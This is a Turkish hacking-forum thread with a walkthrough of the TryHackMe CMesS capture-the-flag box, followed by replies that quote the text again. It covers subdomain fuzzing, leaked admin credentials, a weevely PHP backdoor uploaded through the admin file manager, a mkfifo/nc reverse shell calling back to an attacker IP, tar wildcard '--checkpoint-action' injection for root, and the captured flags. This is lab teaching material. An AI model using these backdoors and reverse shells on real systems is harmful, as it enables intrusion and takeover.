TryHackMe | CMesS CTF Walkthrough WriteUp

Safak-Bey

Uzman üye
9 Ara 2021
1,795
10
1,990
Gereken Yerde
f4j1r6w.png

6nldkai.png


Herkese selamlar dostlar. Bugünkü konumuzda TryHackMe'de bulunan CMesS adlı CTF' i çözeceğiz. CTF' e ulaşmak için buraya tıklayabilirsiniz. Burada bizden istenen iki bilgi var. Birincisi makinenin içine sızarak user.txt dosyasına ulaşmamız. İkincisi ise yetkimizi yükselterek root.txt dosyasına ulaşmamız. Hazırsanız vakit kaybetmeden başlayalım..

5t36e7x.png


GEREKLİ AYARLAMALAR
Ekran-Alintisi.jpg


İlk olarak yukarıda belirtildiği gibi makinenin ip adresini domain olarak /etc/hosts dosyasına ekleyeceğiz. Böylelikle ip adresi ile değil bir domain üzerinden ilerleyeceğiz.
echo '[makine_ip_adresi] cmess.thm' >> /etc/hosts

1.jpg


Ayrıca verilen uyarıyı da dikkate alarak ilerleyeceğiz. "Lütfen bu makinenin kaba kuvvet gerektirmediğini de unutmayın!"

5t36e7x.png


TARAMA, TESPİT

Ayarlamayı yaptıktan sonra cmess.thm adresine gidiyoruz ve web sitesini inceliyoruz.

2.jpg


Web sitesini manuel olarak inceledikten sonra bir de dizin taraması yapalım. Yukarıda tespit edilen dizinlerde "admin" dizini hariç hepsi boş dizinler.

ok5.jpg


Login kısmında sql login bypass, noredirect tarzı herhangi bir açık yok. Şimdi ise subdomain taraması yapacağız.
wfuzz -c -w [wordlist yolu] -u http: //cmess.thm/ -H "HOST: FUZZ.cmess.thm"

3.jpg


Burada uzunluğu farklı olan doğru sonuçtur. Yani sitenin dev.cmess.thm adlı bir subdomaini mevcut. Buna erişmemiz için tekrar /etc/hosts dosyasına ekleme yapacağız.

4.jpg


Subdomaini ekledikten sonra adrese gidiyoruz ve karşımıza bir takım bilgiler çıkıyor.

5.jpg


Burada gördüğünüz gibi [email protected] mail adresinin admin panel şifresinin resetlendiği yazıyor. En altta ise yeni şifreyi bize veriyor. Login bilgilerini alıp admin panele giriyoruz.
Email: [email protected]
Pass: KPFTN_f2yxe%
6.jpg


5t36e7x.png


SIZMA
7.jpg


Admin panele giriş yapıp birazcık dolaştıktan sonra "File Manager" bölümünü görüyoruz. Şimdi buradan backdoor atarak sisteme sızacağız. Ben backdoorumu weevely aracı ile oluşturacağım. Siz isterseniz netcat ile bir bağlantı da kurabilirsiniz.
weevely generate safak123 anka.php

8.jpg


Bu kod sayesinde safak123 parolasına sahip anka.php adında bir backdoor oluşturduk. Şimdi admin panele geri dönüp backdoorumuzu file manager kısmından upload ediyoruz ve dizinleri kontrol ederek anka.php dosyamızın yüklendiği yeri bulmaya çalışıyoruz.

9.jpg


Backdoorumuz assets klasörünün içine yüklenmiş. Şimdi weevely aracımız ile anka.php dosyamıza bağlanacağız.
weevely http: //cmess.thm/assets/anka.php safak123

10.jpg

spaces_-MFlgUPYI8q83vG2IJpI_uploads_git-blob-c570b3d5b5a7e1ea2261f2c2681fbe570bbc9f8c_image.jpg


Sisteme sızdıktan sonra dosyalarda dolaşmaya başlıyoruz. Herhangi bir bilgi, ipucu var mı diye ve /opt/ dizinin altında .password.bak adlı bir dosya ile karşılaşıyoruz. Burada andres kullanıcısının şifresinin yedeklendiğini görüyoruz. Burada elde ettiğimiz bilgiler ile ssh servisine andres kullanıcısı adı altında bağlanmaya çalışacağız.

11.jpg


SSH servisine bağlandıktan sonra ls dediğimizde direkt user.txt dosyasını görüyorsunuz. Cat ile user.txt dosyasını okuyarak bizden istenilen ilk bilgiye elde etmiş olduk.
user.txt: thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}

5t36e7x.png


YETKİ YÜKSELTME
Sıradaki hedefimiz root yetkisi alarak root.txt dosyasına ulaşmamız. Bazı temel şeyleri kontrol ettikten sonra /etc/crontab'ı kontrol edelim. Kontrol ettikten sonra kendi ana klasörümüzde yazma izinlerimiz olduğundan, root olarak reverse_shell elde etmek için * işaretini kötüye kullanabiliriz. İlk olarak reverse shell yapmak için msfvenom ile payload oluşturuyorum.
msfvenom -p cmd/unix/reverse_netcat LHOST=[saldırgan_makine_ip] LPORT=80

13.jpg


Şimdi ise root olmak için makinedeki zafiyetten yaralanıyorum
echo "mkfifo /tmp/tjbtd; nc 192.168.238.128 80 0</tmp/tjbtd | /bin/sh >/tmp/tjbtd 2>&1; rm /tmp/tjbtd" > shell.sh
echo "" > "--checkpoint-action=exec=bash shell.sh"
echo "" > --checkpoint=1

14.jpg


Kodları yazdıktan sonra netcat ile 80 portunu dinlemeye alıyorum. Ve biraz bekledikten sonra bağlantımız geliyor.

1_VAd5Ng5yY-ocWQFh5xsVHg.jpg
root.txt: thm{9f85b7fdeb2cf96985bf5761a93546a2}

Böylelikle CTF makinemizi başarılı bir şekilde çözdük olduk.

12421471862616c7ac749.jpg


Konumuzun sonuna geldik, okuduğunuz için teşekkürler. Başka bir CTF çözümünde görüşmek dileğiyle..
 
Son düzenleme:

Safak-Bey

Uzman üye
9 Ara 2021
1,795
10
1,990
Gereken Yerde
ellerine sağlık güzel başlangıç
Eyvallah Moderatörüm :) Siftahı verdik.. .d
Ellerinize sağlık Şafak hocam, Mükemmel Mükemmel


: D
😂😂 Eyvallah canım sağolasın
Ellwrine sağlık
Teşekkür ederim
Eline sağlık çok güzel bir writeup olmuş
Teşekkürler eyvallah
Teşekkürler
Eline sağlık kardeşim keyifliydi 🙂
Eyvallah kardeşim sağolasın <33
 

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28
f4j1r6w.png

6nldkai.png


Herkese selamlar dostlar. Bugünkü konumuzda TryHackMe'de bulunan CMesS adlı CTF' i çözeceğiz. CTF' e ulaşmak için buraya tıklayabilirsiniz. Burada bizden istenen iki bilgi var. Birincisi makinenin içine sızarak user.txt dosyasına ulaşmamız. İkincisi ise yetkimizi yükselterek root.txt dosyasına ulaşmamız. Hazırsanız vakit kaybetmeden başlayalım..

5t36e7x.png


GEREKLİ AYARLAMALAR
Ekran-Alintisi.jpg


İlk olarak yukarıda belirtildiği gibi makinenin ip adresini domain olarak /etc/hosts dosyasına ekleyeceğiz. Böylelikle ip adresi ile değil bir domain üzerinden ilerleyeceğiz.


1.jpg


Ayrıca verilen uyarıyı da dikkate alarak ilerleyeceğiz. "Lütfen bu makinenin kaba kuvvet gerektirmediğini de unutmayın!"

5t36e7x.png


TARAMA, TESPİT

Ayarlamayı yaptıktan sonra cmess.thm adresine gidiyoruz ve web sitesini inceliyoruz.

2.jpg


Web sitesini manuel olarak inceledikten sonra bir de dizin taraması yapalım. Yukarıda tespit edilen dizinlerde "admin" dizini hariç hepsi boş dizinler.

ok5.jpg


Login kısmında sql login bypass, noredirect tarzı herhangi bir açık yok. Şimdi ise subdomain taraması yapacağız.


3.jpg


Burada uzunluğu farklı olan doğru sonuçtur. Yani sitenin dev.cmess.thm adlı bir subdomaini mevcut. Buna erişmemiz için tekrar /etc/hosts dosyasına ekleme yapacağız.

4.jpg


Subdomaini ekledikten sonra adrese gidiyoruz ve karşımıza bir takım bilgiler çıkıyor.

5.jpg


Burada gördüğünüz gibi [email protected] mail adresinin admin panel şifresinin resetlendiği yazıyor. En altta ise yeni şifreyi bize veriyor. Login bilgilerini alıp admin panele giriyoruz.

6.jpg


5t36e7x.png


SIZMA
7.jpg


Admin panele giriş yapıp birazcık dolaştıktan sonra "File Manager" bölümünü görüyoruz. Şimdi buradan backdoor atarak sisteme sızacağız. Ben backdoorumu weevely aracı ile oluşturacağım. Siz isterseniz netcat ile bir bağlantı da kurabilirsiniz.


8.jpg


Bu kod sayesinde safak123 parolasına sahip anka.php adında bir backdoor oluşturduk. Şimdi admin panele geri dönüp backdoorumuzu file manager kısmından upload ediyoruz ve dizinleri kontrol ederek anka.php dosyamızın yüklendiği yeri bulmaya çalışıyoruz.

9.jpg


Backdoorumuz assets klasörünün içine yüklenmiş. Şimdi weevely aracımız ile anka.php dosyamıza bağlanacağız.


10.jpg

spaces_-MFlgUPYI8q83vG2IJpI_uploads_git-blob-c570b3d5b5a7e1ea2261f2c2681fbe570bbc9f8c_image.jpg


Sisteme sızdıktan sonra dosyalarda dolaşmaya başlıyoruz. Herhangi bir bilgi, ipucu var mı diye ve /opt/ dizinin altında .password.bak adlı bir dosya ile karşılaşıyoruz. Burada andres kullanıcısının şifresinin yedeklendiğini görüyoruz. Burada elde ettiğimiz bilgiler ile ssh servisine andres kullanıcısı adı altında bağlanmaya çalışacağız.


11.jpg


SSH servisine bağlandıktan sonra ls dediğimizde direkt user.txt dosyasını görüyorsunuz. Cat ile user.txt dosyasını okuyarak bizden istenilen ilk bilgiye elde etmiş olduk.


5t36e7x.png


YETKİ YÜKSELTME
Sıradaki hedefimiz root yetkisi alarak root.txt dosyasına ulaşmamız. Bazı temel şeyleri kontrol ettikten sonra /etc/crontab'ı kontrol edelim. Kontrol ettikten sonra kendi ana klasörümüzde yazma izinlerimiz olduğundan, root olarak reverse_shell elde etmek için * işaretini kötüye kullanabiliriz. İlk olarak reverse shell yapmak için msfvenom ile payload oluşturuyorum.



13.jpg


Şimdi ise root olmak için makinedeki zafiyetten yaralanıyorum


14.jpg


Kodları yazdıktan sonra netcat ile 80 portunu dinlemeye alıyorum. Ve biraz bekledikten sonra bağlantımız geliyor.

1_VAd5Ng5yY-ocWQFh5xsVHg.jpg



Böylelikle CTF makinemizi başarılı bir şekilde çözdük olduk.

12421471862616c7ac749.jpg


Konumuzun sonuna geldik, okuduğunuz için teşekkürler. Başka bir CTF çözümünde görüşmek dileğiyle..
Ellerine saglik
 

DarkSky_cyber

Yeni üye
18 Mar 2022
39
20
f4j1r6w.png

6nldkai.png


Herkese selamlar dostlar. Bugünkü konumuzda TryHackMe'de bulunan CMesS adlı CTF' i çözeceğiz. CTF' e ulaşmak için buraya tıklayabilirsiniz. Burada bizden istenen iki bilgi var. Birincisi makinenin içine sızarak user.txt dosyasına ulaşmamız. İkincisi ise yetkimizi yükselterek root.txt dosyasına ulaşmamız. Hazırsanız vakit kaybetmeden başlayalım..

5t36e7x.png


GEREKLİ AYARLAMALAR
Ekran-Alintisi.jpg


İlk olarak yukarıda belirtildiği gibi makinenin ip adresini domain olarak /etc/hosts dosyasına ekleyeceğiz. Böylelikle ip adresi ile değil bir domain üzerinden ilerleyeceğiz.


1.jpg


Ayrıca verilen uyarıyı da dikkate alarak ilerleyeceğiz. "Lütfen bu makinenin kaba kuvvet gerektirmediğini de unutmayın!"

5t36e7x.png


TARAMA, TESPİT

Ayarlamayı yaptıktan sonra cmess.thm adresine gidiyoruz ve web sitesini inceliyoruz.

2.jpg


Web sitesini manuel olarak inceledikten sonra bir de dizin taraması yapalım. Yukarıda tespit edilen dizinlerde "admin" dizini hariç hepsi boş dizinler.

ok5.jpg


Login kısmında sql login bypass, noredirect tarzı herhangi bir açık yok. Şimdi ise subdomain taraması yapacağız.


3.jpg


Burada uzunluğu farklı olan doğru sonuçtur. Yani sitenin dev.cmess.thm adlı bir subdomaini mevcut. Buna erişmemiz için tekrar /etc/hosts dosyasına ekleme yapacağız.

4.jpg


Subdomaini ekledikten sonra adrese gidiyoruz ve karşımıza bir takım bilgiler çıkıyor.

5.jpg


Burada gördüğünüz gibi [email protected] mail adresinin admin panel şifresinin resetlendiği yazıyor. En altta ise yeni şifreyi bize veriyor. Login bilgilerini alıp admin panele giriyoruz.

6.jpg


5t36e7x.png


SIZMA
7.jpg


Admin panele giriş yapıp birazcık dolaştıktan sonra "File Manager" bölümünü görüyoruz. Şimdi buradan backdoor atarak sisteme sızacağız. Ben backdoorumu weevely aracı ile oluşturacağım. Siz isterseniz netcat ile bir bağlantı da kurabilirsiniz.


8.jpg


Bu kod sayesinde safak123 parolasına sahip anka.php adında bir backdoor oluşturduk. Şimdi admin panele geri dönüp backdoorumuzu file manager kısmından upload ediyoruz ve dizinleri kontrol ederek anka.php dosyamızın yüklendiği yeri bulmaya çalışıyoruz.

9.jpg


Backdoorumuz assets klasörünün içine yüklenmiş. Şimdi weevely aracımız ile anka.php dosyamıza bağlanacağız.


10.jpg

spaces_-MFlgUPYI8q83vG2IJpI_uploads_git-blob-c570b3d5b5a7e1ea2261f2c2681fbe570bbc9f8c_image.jpg


Sisteme sızdıktan sonra dosyalarda dolaşmaya başlıyoruz. Herhangi bir bilgi, ipucu var mı diye ve /opt/ dizinin altında .password.bak adlı bir dosya ile karşılaşıyoruz. Burada andres kullanıcısının şifresinin yedeklendiğini görüyoruz. Burada elde ettiğimiz bilgiler ile ssh servisine andres kullanıcısı adı altında bağlanmaya çalışacağız.


11.jpg


SSH servisine bağlandıktan sonra ls dediğimizde direkt user.txt dosyasını görüyorsunuz. Cat ile user.txt dosyasını okuyarak bizden istenilen ilk bilgiye elde etmiş olduk.


5t36e7x.png


YETKİ YÜKSELTME
Sıradaki hedefimiz root yetkisi alarak root.txt dosyasına ulaşmamız. Bazı temel şeyleri kontrol ettikten sonra /etc/crontab'ı kontrol edelim. Kontrol ettikten sonra kendi ana klasörümüzde yazma izinlerimiz olduğundan, root olarak reverse_shell elde etmek için * işaretini kötüye kullanabiliriz. İlk olarak reverse shell yapmak için msfvenom ile payload oluşturuyorum.



13.jpg


Şimdi ise root olmak için makinedeki zafiyetten yaralanıyorum


14.jpg


Kodları yazdıktan sonra netcat ile 80 portunu dinlemeye alıyorum. Ve biraz bekledikten sonra bağlantımız geliyor.

1_VAd5Ng5yY-ocWQFh5xsVHg.jpg



Böylelikle CTF makinemizi başarılı bir şekilde çözdük olduk.

12421471862616c7ac749.jpg


Konumuzun sonuna geldik, okuduğunuz için teşekkürler. Başka bir CTF çözümünde görüşmek dileğiyle..
eline sağlık :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.